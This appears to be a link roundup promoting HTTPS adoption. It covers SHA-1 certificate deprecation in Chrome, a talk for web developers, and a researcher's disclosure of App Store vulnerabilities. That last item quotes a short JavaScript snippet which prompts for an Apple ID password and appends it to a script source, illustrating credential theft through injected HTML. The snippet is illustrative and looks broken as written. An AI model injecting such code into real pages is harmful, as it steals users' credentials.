Why Google is Hurrying the Web to Kill SHA-1

Something like 90% of websites that use SSL encryption use an algorithm called SHA-1 to protect themselves from being impersonated. This guarantees that when you go to green lock for facebook.com, you’re visiting the real Facebook and not giving your password to an attacker.

Unfortunately, SHA-1 is dangerously weak, and has been for a long time. It gets weaker every year, but remains widely used on the internet. Its replacement, SHA-2, is strong and supported just about everywhere.

Google recently announced that if you use Chrome, then you’re about to start seeing a progression of warnings for many secure websites

Why Google is Hurrying the Web to Kill SHA-1 →
Check your site for weak SHA-1 certificates →

Got SLL?

This talk is a call to arms to all of you as web developers. In the next 30 minutes, I hope to convince you of the necessity and practicality of SSL today, and then give you some pointers on how to go make it happen.

Be sure to hit the S key (or press the cog at the bottom and select “Open Speaker Notes” to show the presenter notes that go with this talk.

Got SSL? →

Long overdue: HTTPS for the App Store

Early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. Early March Apple finally issued a fix for it and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enabled HTTPS to protect users. This post discuss the vulnerabilities I found.

Attacks included Password stealing, App swapping, App fake upgrade, Preventing application installation, and Privacy leak — All made possible by simply intercepting and manipulating the HTML that’s being used by the App Store app.

 password = prompt("Apple ID Password","");
 var s = document.createElement('script');
 s.type = "text/javascript";  
 s.src = "fakepassword=" + password;
 var script = document.createTextNode(s);

May this be a lesson for all those offering services out there to enable SSL and route all traffic over HTTPS.

Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities →